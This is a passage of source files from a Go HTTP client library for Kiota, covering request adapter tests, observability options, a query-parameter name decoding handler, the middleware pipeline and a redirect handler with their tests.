err2.Error()) 111 | } 112 | 113 | func TestImplementationHonoursInterface(t *testing.T) { 114 | authProvider := &absauth.AnonymousAuthenticationProvider{} 115 | adapter, err := NewNetHttpRequestAdapter(authProvider) 116 | assert.Nil(t, err) 117 | assert.NotNil(t, adapter) 118 | 119 | assert.Implements(t, (*abs.RequestAdapter)(nil), adapter) 120 | } 121 | 122 | func TestItDoesntFailOnEmptyContentType(t *testing.T) { 123 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 124 | res.WriteHeader(201) 125 | })) 126 | defer func() { testServer.Close() }() 127 | authProvider := &absauth.AnonymousAuthenticationProvider{} 128 | adapter, err := NewNetHttpRequestAdapter(authProvider) 129 | assert.Nil(t, err) 130 | assert.NotNil(t, adapter) 131 | 132 | uri, err := url.Parse(testServer.URL) 133 | assert.Nil(t, err) 134 | assert.NotNil(t, uri) 135 | request := abs.NewRequestInformation() 136 | request.SetUri(*uri) 137 | request.Method = abs.GET 138 | 139 | res, err := adapter.Send(context.Background(), request, nil, nil) 140 | assert.Nil(t, err) 141 | assert.Nil(t, res) 142 | } 143 | 144 | func TestItReturnsUsableStreamOnStream(t *testing.T) { 145 | statusCodes := []int{200, 201, 202, 203, 206} 146 | 147 | for i := 0; i < len(statusCodes); i++ { 148 | 149 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 150 | res.WriteHeader(statusCodes[i]) 151 | res.Write([]byte("test")) 152 | })) 153 | defer func() { testServer.Close() }() 154 | authProvider := &absauth.AnonymousAuthenticationProvider{} 155 | adapter, err := NewNetHttpRequestAdapter(authProvider) 156 | assert.Nil(t, err) 157 | assert.NotNil(t, adapter) 158 | 159 | uri, err := url.Parse(testServer.URL) 160 | assert.Nil(t, err) 161 | assert.NotNil(t, uri) 162 | request := abs.NewRequestInformation() 163 | request.SetUri(*uri) 164 | request.Method = abs.GET 165 | 166 | res, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", nil) 167 | assert.Nil(t, err2) 168 | assert.NotNil(t, res) 169 | assert.Equal(t, 4, len(res.([]byte))) 170 | } 171 | } 172 | 173 | func TestItReturnsNilOnStream(t *testing.T) { 174 | statusCodes := []int{200, 201, 202, 203, 204} 175 | 176 | for i := 0; i < len(statusCodes); i++ { 177 | 178 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 179 | res.WriteHeader(statusCodes[i]) 180 | })) 181 | defer func() { testServer.Close() }() 182 | authProvider := &absauth.AnonymousAuthenticationProvider{} 183 | adapter, err := NewNetHttpRequestAdapter(authProvider) 184 | assert.Nil(t, err) 185 | assert.NotNil(t, adapter) 186 | 187 | uri, err := url.Parse(testServer.URL) 188 | assert.Nil(t, err) 189 | assert.NotNil(t, uri) 190 | request := abs.NewRequestInformation() 191 | request.SetUri(*uri) 192 | request.Method = abs.GET 193 | 194 | res, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", nil) 195 | assert.Nil(t, err2) 196 | assert.Nil(t, res) 197 | } 198 | } 199 | 200 | func TestSendNoContentDoesntFailOnOtherCodes(t *testing.T) { 201 | statusCodes := []int{200, 201, 202, 203, 204, 206} 202 | 203 | for i := 0; i < len(statusCodes); i++ { 204 | 205 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 206 | res.WriteHeader(statusCodes[i]) 207 | })) 208 | defer func() { testServer.Close() }() 209 | authProvider := &absauth.AnonymousAuthenticationProvider{} 210 | adapter, err := NewNetHttpRequestAdapter(authProvider) 211 | assert.Nil(t, err) 212 | assert.NotNil(t, adapter) 213 | 214 | uri, err := url.Parse(testServer.URL) 215 | assert.Nil(t, err) 216 | assert.NotNil(t, uri) 217 | request := abs.NewRequestInformation() 218 | request.SetUri(*uri) 219 | request.Method = abs.GET 220 | 221 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 222 | assert.Nil(t, err2) 223 | } 224 | } 225 | 226 | func TestSendReturnNilOnNoContent(t *testing.T) { 227 | statusCodes := []int{200, 201, 202, 203, 204, 205} 228 | 229 | for i := 0; i < len(statusCodes); i++ { 230 | 231 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 232 | res.WriteHeader(statusCodes[i]) 233 | })) 234 | defer func() { testServer.Close() }() 235 | authProvider := &absauth.AnonymousAuthenticationProvider{} 236 | adapter, err := NewNetHttpRequestAdapter(authProvider) 237 | assert.Nil(t, err) 238 | assert.NotNil(t, adapter) 239 | 240 | uri, err := url.Parse(testServer.URL) 241 | assert.Nil(t, err) 242 | assert.NotNil(t, uri) 243 | request := abs.NewRequestInformation() 244 | request.SetUri(*uri) 245 | request.Method = abs.GET 246 | 247 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 248 | assert.Nil(t, err2) 249 | assert.Nil(t, res) 250 | } 251 | } 252 | 253 | func TestSendReturnErrOnNoContent(t *testing.T) { 254 | // Subset of status codes this applies to since there's many of them. This 255 | // could be switched to ranges if full coverage is desired. 256 | statusCodes := []int{nethttp.StatusBadRequest, nethttp.StatusInternalServerError} 257 | 258 | for _, code := range statusCodes { 259 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 260 | res.WriteHeader(code) 261 | })) 262 | defer func() { testServer.Close() }() 263 | 264 | authProvider := &absauth.AnonymousAuthenticationProvider{} 265 | adapter, err := NewNetHttpRequestAdapter(authProvider) 266 | assert.Nil(t, err) 267 | assert.NotNil(t, adapter) 268 | 269 | uri, err := url.Parse(testServer.URL) 270 | assert.Nil(t, err) 271 | assert.NotNil(t, uri) 272 | request := abs.NewRequestInformation() 273 | request.SetUri(*uri) 274 | request.Method = abs.GET 275 | 276 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 277 | assert.Error(t, err2) 278 | assert.Nil(t, res) 279 | } 280 | } 281 | 282 | func TestSendReturnsObjectOnContent(t *testing.T) { 283 | statusCodes := []int{200, 201, 202, 203, 204, 205} 284 | 285 | for i := 0; i < len(statusCodes); i++ { 286 | 287 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 288 | res.WriteHeader(statusCodes[i]) 289 | })) 290 | defer func() { testServer.Close() }() 291 | authProvider := &absauth.AnonymousAuthenticationProvider{} 292 | adapter, err := NewNetHttpRequestAdapterWithParseNodeFactory(authProvider, &internal.MockParseNodeFactory{}) 293 | assert.Nil(t, err) 294 | assert.NotNil(t, adapter) 295 | 296 | uri, err := url.Parse(testServer.URL) 297 | assert.Nil(t, err) 298 | assert.NotNil(t, uri) 299 | request := abs.NewRequestInformation() 300 | request.SetUri(*uri) 301 | request.Method = abs.GET 302 | 303 | res, err2 := adapter.Send(context.TODO(), request, internal.MockEntityFactory, nil) 304 | assert.Nil(t, err2) 305 | assert.Nil(t, res) 306 | } 307 | } 308 | 309 | func TestResponseHandlerIsCalledWhenProvided(t *testing.T) { 310 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 311 | res.WriteHeader(201) 312 | })) 313 | defer func() { testServer.Close() }() 314 | authProvider := &absauth.AnonymousAuthenticationProvider{} 315 | adapter, err := NewNetHttpRequestAdapter(authProvider) 316 | assert.Nil(t, err) 317 | assert.NotNil(t, adapter) 318 | 319 | uri, err := url.Parse(testServer.URL) 320 | assert.Nil(t, err) 321 | assert.NotNil(t, uri) 322 | request := abs.NewRequestInformation() 323 | request.SetUri(*uri) 324 | request.Method = abs.GET 325 | 326 | count := 1 327 | responseHandler := func(response interface{}, errorMappings abs.ErrorMappings) (interface{}, error) { 328 | count = 2 329 | return nil, nil 330 | } 331 | 332 | handlerOption := abs.NewRequestHandlerOption() 333 | handlerOption.SetResponseHandler(responseHandler) 334 | 335 | request.AddRequestOptions([]abs.RequestOption{handlerOption}) 336 | 337 | err = adapter.SendNoContent(context.Background(), request, nil) 338 | assert.Nil(t, err) 339 | assert.Equal(t, 2, count) 340 | } 341 | 342 | func TestNetHttpRequestAdapter_EnableBackingStore(t *testing.T) { 343 | authProvider := &absauth.AnonymousAuthenticationProvider{} 344 | adapter, err := NewNetHttpRequestAdapter(authProvider) 345 | assert.NoError(t, err) 346 | 347 | var store = func() absstore.BackingStore { 348 | return nil 349 | } 350 | 351 | assert.NotEqual(t, absstore.BackingStoreFactoryInstance(), store()) 352 | adapter.EnableBackingStore(store) 353 | assert.Equal(t, absstore.BackingStoreFactoryInstance(), store()) 354 | } 355 | -------------------------------------------------------------------------------- /observability_options.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | abs "github.com/microsoft/kiota-abstractions-go" 7 | ) 8 | 9 | // ObservabilityOptions holds the tracing, metrics and logging configuration for the request adapter 10 | type ObservabilityOptions struct { 11 | // Whether to include attributes which could contains EUII information like URLs 12 | IncludeEUIIAttributes bool 13 | } 14 | 15 | // GetTracerInstrumentationName returns the observability name to use for the tracer 16 | func (o *ObservabilityOptions) GetTracerInstrumentationName() string { 17 | return "github.com/ordinaryhydr/kiota-http-go" 18 | } 19 | 20 | // GetIncludeEUIIAttributes returns whether to include attributes which could contains EUII information 21 | func (o *ObservabilityOptions) GetIncludeEUIIAttributes() bool { 22 | return o.IncludeEUIIAttributes 23 | } 24 | 25 | // SetIncludeEUIIAttributes set whether to include attributes which could contains EUII information 26 | func (o *ObservabilityOptions) SetIncludeEUIIAttributes(value bool) { 27 | o.IncludeEUIIAttributes = value 28 | } 29 | 30 | // ObservabilityOptionsInt defines the options contract for handlers 31 | type ObservabilityOptionsInt interface { 32 | abs.RequestOption 33 | GetTracerInstrumentationName() string 34 | GetIncludeEUIIAttributes() bool 35 | SetIncludeEUIIAttributes(value bool) 36 | } 37 | 38 | func (*ObservabilityOptions) GetKey() abs.RequestOptionKey { 39 | return observabilityOptionsKeyValue 40 | } 41 | 42 | var observabilityOptionsKeyValue = abs.RequestOptionKey{ 43 | Key: "ObservabilityOptions", 44 | } 45 | 46 | // GetObservabilityOptionsFromRequest returns the observability options from the request context 47 | func GetObservabilityOptionsFromRequest(req *nethttp.Request) ObservabilityOptionsInt { 48 | if options, ok := req.Context().Value(observabilityOptionsKeyValue).(ObservabilityOptionsInt); ok { 49 | return options 50 | } 51 | return nil 52 | } 53 | -------------------------------------------------------------------------------- /parameters_name_decoding_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | "strconv" 6 | "strings" 7 | 8 | abs "github.com/microsoft/kiota-abstractions-go" 9 | "go.opentelemetry.io/otel" 10 | "go.opentelemetry.io/otel/attribute" 11 | ) 12 | 13 | // ParametersNameDecodingOptions defines the options for the ParametersNameDecodingHandler 14 | type ParametersNameDecodingOptions struct { 15 | // Enable defines if the parameters name decoding should be enabled 16 | Enable bool 17 | // ParametersToDecode defines the characters that should be decoded 18 | ParametersToDecode []byte 19 | } 20 | 21 | // ParametersNameDecodingHandler decodes special characters in the request query parameters that had to be encoded due to RFC 6570 restrictions names before executing the request. 22 | type ParametersNameDecodingHandler struct { 23 | options ParametersNameDecodingOptions 24 | } 25 | 26 | // NewParametersNameDecodingHandler creates a new ParametersNameDecodingHandler with default options 27 | func NewParametersNameDecodingHandler() *ParametersNameDecodingHandler { 28 | return NewParametersNameDecodingHandlerWithOptions(ParametersNameDecodingOptions{ 29 | Enable: true, 30 | ParametersToDecode: []byte{'-', '.', '~', '$'}, 31 | }) 32 | } 33 | 34 | // NewParametersNameDecodingHandlerWithOptions creates a new ParametersNameDecodingHandler with the given options 35 | func NewParametersNameDecodingHandlerWithOptions(options ParametersNameDecodingOptions) *ParametersNameDecodingHandler { 36 | return &ParametersNameDecodingHandler{options: options} 37 | } 38 | 39 | type parametersNameDecodingOptionsInt interface { 40 | abs.RequestOption 41 | GetEnable() bool 42 | GetParametersToDecode() []byte 43 | } 44 | 45 | var parametersNameDecodingKeyValue = abs.RequestOptionKey{ 46 | Key: "ParametersNameDecodingHandler", 47 | } 48 | 49 | // GetKey returns the key value to be used when the option is added to the request context 50 | func (options *ParametersNameDecodingOptions) GetKey() abs.RequestOptionKey { 51 | return parametersNameDecodingKeyValue 52 | } 53 | 54 | // GetEnable returns the enable value from the option 55 | func (options *ParametersNameDecodingOptions) GetEnable() bool { 56 | return options.Enable 57 | } 58 | 59 | // GetParametersToDecode returns the parametersToDecode value from the option 60 | func (options *ParametersNameDecodingOptions) GetParametersToDecode() []byte { 61 | return options.ParametersToDecode 62 | } 63 | 64 | // Intercept implements the RequestInterceptor interface and decodes the parameters name 65 | func (handler *ParametersNameDecodingHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 66 | reqOption, ok := req.Context().Value(parametersNameDecodingKeyValue).(parametersNameDecodingOptionsInt) 67 | if !ok { 68 | reqOption = &handler.options 69 | } 70 | obsOptions := GetObservabilityOptionsFromRequest(req) 71 | ctx := req.Context() 72 | if obsOptions != nil { 73 | ctx, span := otel.GetTracerProvider().Tracer(obsOptions.GetTracerInstrumentationName()).Start(ctx, "ParametersNameDecodingHandler_Intercept") 74 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.parameters_name_decoding.enable", reqOption.GetEnable())) 75 | req = req.WithContext(ctx) 76 | defer span.End() 77 | } 78 | if reqOption.GetEnable() && 79 | len(reqOption.GetParametersToDecode()) != 0 && 80 | strings.Contains(req.URL.RawQuery, "%") { 81 | req.URL.RawQuery = decodeUriEncodedString(req.URL.RawQuery, reqOption.GetParametersToDecode()) 82 | } 83 | return pipeline.Next(req, middlewareIndex) 84 | } 85 | 86 | func decodeUriEncodedString(originalValue string, parametersToDecode []byte) string { 87 | resultValue := originalValue 88 | for _, parameter := range parametersToDecode { 89 | valueToReplace := "%" + strconv.FormatInt(int64(parameter), 16) 90 | replacementValue := string(parameter) 91 | resultValue = strings.ReplaceAll(strings.ReplaceAll(resultValue, strings.ToUpper(valueToReplace), replacementValue), strings.ToLower(valueToReplace), replacementValue) 92 | } 93 | return resultValue 94 | } 95 | -------------------------------------------------------------------------------- /parameters_name_decoding_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | "testing" 7 | 8 | "github.com/stretchr/testify/assert" 9 | ) 10 | 11 | func TestItDecodesQueryParameterNames(t *testing.T) { 12 | testData := [][]string{ 13 | {"?%24select=diplayName&api%2Dversion=2", "/?$select=diplayName&api-version=2"}, 14 | {"?%24select=diplayName&api%7Eversion=2", "/?$select=diplayName&api~version=2"}, 15 | {"?%24select=diplayName&api%2Eversion=2", "/?$select=diplayName&api.version=2"}, 16 | {"/api-version/?%24select=diplayName&api%2Eversion=2", "/api-version/?$select=diplayName&api.version=2"}, 17 | {"", "/"}, 18 | {"?q=1%2B2", "/?q=1%2B2"}, //Values are not decoded 19 | {"?q=M%26A", "/?q=M%26A"}, //Values are not decoded 20 | {"?q%2D1=M%26A", "/?q-1=M%26A"}, //Values are not decoded but params are 21 | {"?q%2D1&q=M%26A=M%26A", "/?q-1&q=M%26A=M%26A"}, //Values are not decoded but params are 22 | {"?%24select=diplayName&api%2Dversion=1%2B2", "/?$select=diplayName&api-version=1%2B2"}, //Values are not decoded but params are 23 | {"?%24select=diplayName&api%2Dversion=M%26A", "/?$select=diplayName&api-version=M%26A"}, //Values are not decoded but params are 24 | {"?%24select=diplayName&api%7Eversion=M%26A", "/?$select=diplayName&api~version=M%26A"}, //Values are not decoded but params are 25 | {"?%24select=diplayName&api%2Eversion=M%26A", "/?$select=diplayName&api.version=M%26A"}, //Values are not decoded but params are 26 | {"?%24select=diplayName&api%2Eversion=M%26A", "/?$select=diplayName&api.version=M%26A"}, //Values are not decoded but params are 27 | } 28 | result := "" 29 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 30 | result = req.URL.String() 31 | res.WriteHeader(200) 32 | res.Write([]byte("body")) 33 | })) 34 | defer func() { testServer.Close() }() 35 | for _, data := range testData { 36 | handler := NewParametersNameDecodingHandler() 37 | input := testServer.URL + data[0] 38 | expected := data[1] 39 | req, err := nethttp.NewRequest(nethttp.MethodGet, input, nil) 40 | if err != nil { 41 | t.Error(err) 42 | } 43 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 44 | if err != nil { 45 | t.Error(err) 46 | } 47 | assert.NotNil(t, resp) 48 | assert.Equal(t, expected, result) 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /pipeline.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | 6 | "go.opentelemetry.io/otel" 7 | "go.opentelemetry.io/otel/trace" 8 | ) 9 | 10 | // Pipeline contract for middleware infrastructure 11 | type Pipeline interface { 12 | // Next moves the request object through middlewares in the pipeline 13 | Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) 14 | } 15 | 16 | // custom transport for net/http with a middleware pipeline 17 | type customTransport struct { 18 | // middleware pipeline in use for the client 19 | middlewarePipeline *middlewarePipeline 20 | } 21 | 22 | // middleware pipeline implementation using a roundtripper from net/http 23 | type middlewarePipeline struct { 24 | // the round tripper to use to execute the request 25 | transport nethttp.RoundTripper 26 | // the middlewares to execute 27 | middlewares []Middleware 28 | } 29 | 30 | func newMiddlewarePipeline(middlewares []Middleware, transport nethttp.RoundTripper) *middlewarePipeline { 31 | return &middlewarePipeline{ 32 | transport: transport, 33 | middlewares: middlewares, 34 | } 35 | } 36 | 37 | // Next moves the request object through middlewares in the pipeline 38 | func (pipeline *middlewarePipeline) Next(req *nethttp.Request, middlewareIndex int) (*nethttp.Response, error) { 39 | if middlewareIndex < len(pipeline.middlewares) { 40 | middleware := pipeline.middlewares[middlewareIndex] 41 | return middleware.Intercept(pipeline, middlewareIndex+1, req) 42 | } 43 | obsOptions := GetObservabilityOptionsFromRequest(req) 44 | ctx := req.Context() 45 | var span trace.Span 46 | var observabilityName string 47 | if obsOptions != nil { 48 | observabilityName = obsOptions.GetTracerInstrumentationName() 49 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "request_transport") 50 | defer span.End() 51 | req = req.WithContext(ctx) 52 | } 53 | return pipeline.transport.RoundTrip(req) 54 | } 55 | 56 | // RoundTrip executes the the next middleware and returns a response 57 | func (transport *customTransport) RoundTrip(req *nethttp.Request) (*nethttp.Response, error) { 58 | return transport.middlewarePipeline.Next(req, 0) 59 | } 60 | 61 | // GetDefaultTransport returns the default http transport used by the library 62 | func GetDefaultTransport() nethttp.RoundTripper { 63 | defaultTransport, ok := nethttp.DefaultTransport.(*nethttp.Transport) 64 | if !ok { 65 | return nethttp.DefaultTransport 66 | } 67 | defaultTransport = defaultTransport.Clone() 68 | defaultTransport.ForceAttemptHTTP2 = true 69 | defaultTransport.DisableCompression = false 70 | return defaultTransport 71 | } 72 | 73 | // NewCustomTransport creates a new custom transport for http client with the provided set of middleware 74 | func NewCustomTransport(middlewares ...Middleware) *customTransport { 75 | return NewCustomTransportWithParentTransport(nil, middlewares...) 76 | } 77 | 78 | // NewCustomTransportWithParentTransport creates a new custom transport which relies on the provided transport for http client with the provided set of middleware 79 | func NewCustomTransportWithParentTransport(parentTransport nethttp.RoundTripper, middlewares ...Middleware) *customTransport { 80 | if len(middlewares) == 0 { 81 | middlewares = GetDefaultMiddlewares() 82 | } 83 | if parentTransport == nil { 84 | parentTransport = GetDefaultTransport() 85 | } 86 | return &customTransport{ 87 | middlewarePipeline: newMiddlewarePipeline(middlewares, parentTransport), 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /pipeline_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | assert "github.com/stretchr/testify/assert" 5 | "net/http" 6 | "testing" 7 | ) 8 | 9 | type TestMiddleware struct{} 10 | 11 | func (middleware TestMiddleware) Intercept(pipeline Pipeline, middlewareIndex int, req *http.Request) (*http.Response, error) { 12 | req.Header.Add("test", "test-header") 13 | 14 | return pipeline.Next(req, middlewareIndex) 15 | } 16 | 17 | func TestCanInterceptRequests(t *testing.T) { 18 | transport := NewCustomTransport(&TestMiddleware{}) 19 | client := &http.Client{Transport: transport} 20 | resp, _ := client.Get("https://example.com") 21 | 22 | expect := "test-header" 23 | got := resp.Request.Header.Get("test") 24 | 25 | if expect != got { 26 | t.Errorf("Expected: %v, but received: %v", expect, got) 27 | } 28 | } 29 | 30 | func TestCanInterceptMultipleRequests(t *testing.T) { 31 | transport := NewCustomTransport(&TestMiddleware{}) 32 | client := &http.Client{Transport: transport} 33 | resp, _ := client.Get("https://example.com") 34 | 35 | expect := "test-header" 36 | got := resp.Request.Header.Get("test") 37 | 38 | if expect != got { 39 | t.Errorf("Expected: %v, but received: %v", expect, got) 40 | } 41 | 42 | resp2, _ := client.Get("https://example.com") 43 | 44 | got2 := resp2.Request.Header.Get("test") 45 | 46 | if expect != got2 { 47 | t.Errorf("Expected: %v, but received: %v", expect, got2) 48 | } 49 | } 50 | 51 | func TestItReturnsADefaultTransport(t *testing.T) { 52 | transport := GetDefaultTransport() 53 | assert.NotNil(t, transport) 54 | defaultTransport, ok := transport.(*http.Transport) 55 | assert.True(t, ok) 56 | assert.True(t, defaultTransport.ForceAttemptHTTP2) 57 | } 58 | 59 | func TestItAcceptsACustomizedTransport(t *testing.T) { 60 | transport := http.DefaultTransport.(*http.Transport).Clone() 61 | transport.ForceAttemptHTTP2 = false 62 | customTransport := NewCustomTransportWithParentTransport(transport) 63 | assert.NotNil(t, customTransport) 64 | result, ok := customTransport.middlewarePipeline.transport.(*http.Transport) 65 | assert.True(t, ok) 66 | assert.False(t, result.ForceAttemptHTTP2) 67 | } 68 | 69 | func TestItGetsADefaultTransportIfNoneIsProvided(t *testing.T) { 70 | customTransport := NewCustomTransport() 71 | assert.NotNil(t, customTransport.middlewarePipeline.transport) 72 | } 73 | -------------------------------------------------------------------------------- /redirect_handler.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | nethttp "net/http" 8 | "net/url" 9 | "strings" 10 | 11 | abs "github.com/microsoft/kiota-abstractions-go" 12 | "go.opentelemetry.io/otel" 13 | "go.opentelemetry.io/otel/attribute" 14 | "go.opentelemetry.io/otel/trace" 15 | ) 16 | 17 | // RedirectHandler handles redirect responses and follows them according to the options specified. 18 | type RedirectHandler struct { 19 | // options to use when evaluating whether to redirect or not 20 | options RedirectHandlerOptions 21 | } 22 | 23 | // NewRedirectHandler creates a new redirect handler with the default options. 24 | func NewRedirectHandler() *RedirectHandler { 25 | return NewRedirectHandlerWithOptions(RedirectHandlerOptions{ 26 | MaxRedirects: defaultMaxRedirects, 27 | ShouldRedirect: func(req *nethttp.Request, res *nethttp.Response) bool { 28 | return true 29 | }, 30 | }) 31 | } 32 | 33 | // NewRedirectHandlerWithOptions creates a new redirect handler with the specified options. 34 | func NewRedirectHandlerWithOptions(options RedirectHandlerOptions) *RedirectHandler { 35 | return &RedirectHandler{options: options} 36 | } 37 | 38 | // RedirectHandlerOptions to use when evaluating whether to redirect or not. 39 | type RedirectHandlerOptions struct { 40 | // A callback that determines whether to redirect or not. 41 | ShouldRedirect func(req *nethttp.Request, res *nethttp.Response) bool 42 | // The maximum number of redirects to follow. 43 | MaxRedirects int 44 | } 45 | 46 | var redirectKeyValue = abs.RequestOptionKey{ 47 | Key: "RedirectHandler", 48 | } 49 | 50 | type redirectHandlerOptionsInt interface { 51 | abs.RequestOption 52 | GetShouldRedirect() func(req *nethttp.Request, res *nethttp.Response) bool 53 | GetMaxRedirect() int 54 | } 55 | 56 | // GetKey returns the key value to be used when the option is added to the request context 57 | func (options *RedirectHandlerOptions) GetKey() abs.RequestOptionKey { 58 | return redirectKeyValue 59 | } 60 | 61 | // GetShouldRedirect returns the redirection evaluation function. 62 | func (options *RedirectHandlerOptions) GetShouldRedirect() func(req *nethttp.Request, res *nethttp.Response) bool { 63 | return options.ShouldRedirect 64 | } 65 | 66 | // GetMaxRedirect returns the maximum number of redirects to follow. 67 | func (options *RedirectHandlerOptions) GetMaxRedirect() int { 68 | if options == nil || options.MaxRedirects < 1 { 69 | return defaultMaxRedirects 70 | } else if options.MaxRedirects > absoluteMaxRedirects { 71 | return absoluteMaxRedirects 72 | } else { 73 | return options.MaxRedirects 74 | } 75 | } 76 | 77 | const defaultMaxRedirects = 5 78 | const absoluteMaxRedirects = 20 79 | const movedPermanently = 301 80 | const found = 302 81 | const seeOther = 303 82 | const temporaryRedirect = 307 83 | const permanentRedirect = 308 84 | const locationHeader = "Location" 85 | 86 | // Intercept implements the interface and evaluates whether to follow a redirect response. 87 | func (middleware RedirectHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 88 | obsOptions := GetObservabilityOptionsFromRequest(req) 89 | ctx := req.Context() 90 | var span trace.Span 91 | var observabilityName string 92 | if obsOptions != nil { 93 | observabilityName = obsOptions.GetTracerInstrumentationName() 94 | ctx, span = otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RedirectHandler_Intercept") 95 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.redirect.enable", true)) 96 | defer span.End() 97 | req = req.WithContext(ctx) 98 | } 99 | response, err := pipeline.Next(req, middlewareIndex) 100 | if err != nil { 101 | return response, err 102 | } 103 | reqOption, ok := req.Context().Value(redirectKeyValue).(redirectHandlerOptionsInt) 104 | if !ok { 105 | reqOption = &middleware.options 106 | } 107 | return middleware.redirectRequest(ctx, pipeline, middlewareIndex, reqOption, req, response, 0, observabilityName) 108 | } 109 | 110 | func (middleware RedirectHandler) redirectRequest(ctx context.Context, pipeline Pipeline, middlewareIndex int, reqOption redirectHandlerOptionsInt, req *nethttp.Request, response *nethttp.Response, redirectCount int, observabilityName string) (*nethttp.Response, error) { 111 | shouldRedirect := reqOption.GetShouldRedirect() != nil && reqOption.GetShouldRedirect()(req, response) || reqOption.GetShouldRedirect() == nil 112 | if middleware.isRedirectResponse(response) && 113 | redirectCount < reqOption.GetMaxRedirect() && 114 | shouldRedirect { 115 | redirectCount++ 116 | redirectRequest, err := middleware.getRedirectRequest(req, response) 117 | if err != nil { 118 | return response, err 119 | } 120 | if observabilityName != "" { 121 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "RedirectHandler_Intercept - redirect "+fmt.Sprint(redirectCount)) 122 | span.SetAttributes(attribute.Int("com.microsoft.kiota.handler.redirect.count", redirectCount), 123 | httpResponseStatusCodeAttribute.Int(response.StatusCode), 124 | ) 125 | defer span.End() 126 | redirectRequest = redirectRequest.WithContext(ctx) 127 | } 128 | 129 | result, err := pipeline.Next(redirectRequest, middlewareIndex) 130 | if err != nil { 131 | return result, err 132 | } 133 | return middleware.redirectRequest(ctx, pipeline, middlewareIndex, reqOption, redirectRequest, result, redirectCount, observabilityName) 134 | } 135 | return response, nil 136 | } 137 | 138 | func (middleware RedirectHandler) isRedirectResponse(response *nethttp.Response) bool { 139 | if response == nil { 140 | return false 141 | } 142 | locationHeader := response.Header.Get(locationHeader) 143 | if locationHeader == "" { 144 | return false 145 | } 146 | statusCode := response.StatusCode 147 | return statusCode == movedPermanently || statusCode == found || statusCode == seeOther || statusCode == temporaryRedirect || statusCode == permanentRedirect 148 | } 149 | 150 | func (middleware RedirectHandler) getRedirectRequest(request *nethttp.Request, response *nethttp.Response) (*nethttp.Request, error) { 151 | if request == nil || response == nil { 152 | return nil, errors.New("request or response is nil") 153 | } 154 | locationHeaderValue := response.Header.Get(locationHeader) 155 | if locationHeaderValue[0] == '/' { 156 | locationHeaderValue = request.URL.Scheme + "://" + request.URL.Host + locationHeaderValue 157 | } 158 | result := request.Clone(request.Context()) 159 | targetUrl, err := url.Parse(locationHeaderValue) 160 | if err != nil { 161 | return nil, err 162 | } 163 | result.URL = targetUrl 164 | if result.Host != targetUrl.Host { 165 | result.Host = targetUrl.Host 166 | } 167 | sameHost := strings.EqualFold(targetUrl.Host, request.URL.Host) 168 | sameScheme := strings.EqualFold(targetUrl.Scheme, request.URL.Scheme) 169 | if !sameHost || !sameScheme { 170 | result.Header.Del("Authorization") 171 | } 172 | if response.StatusCode == seeOther { 173 | result.Method = nethttp.MethodGet 174 | result.Header.Del("Content-Type") 175 | result.Header.Del("Content-Length") 176 | result.Body = nil 177 | } 178 | return result, nil 179 | } 180 | -------------------------------------------------------------------------------- /redirect_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | testing "testing" 7 | 8 | "strconv" 9 | 10 | assert "github.com/stretchr/testify/assert" 11 | ) 12 | 13 | func TestItCreatesANewRedirectHandler(t *testing.T) { 14 | handler := NewRedirectHandler() 15 | if handler == nil { 16 | t.Error("handler is nil") 17 | } 18 | } 19 | 20 | func TestItDoesntRedirectWithoutMiddleware(t *testing.T) { 21 | requestCount := int64(0) 22 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 23 | requestCount++ 24 | res.Header().Set("Location", "/"+strconv.FormatInt(requestCount, 10)) 25 | res.WriteHeader(301) 26 | res.Write([]byte("body")) 27 | })) 28 | defer func() { testServer.Close() }() 29 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 30 | if err != nil { 31 | t.Error(err) 32 | } 33 | client := 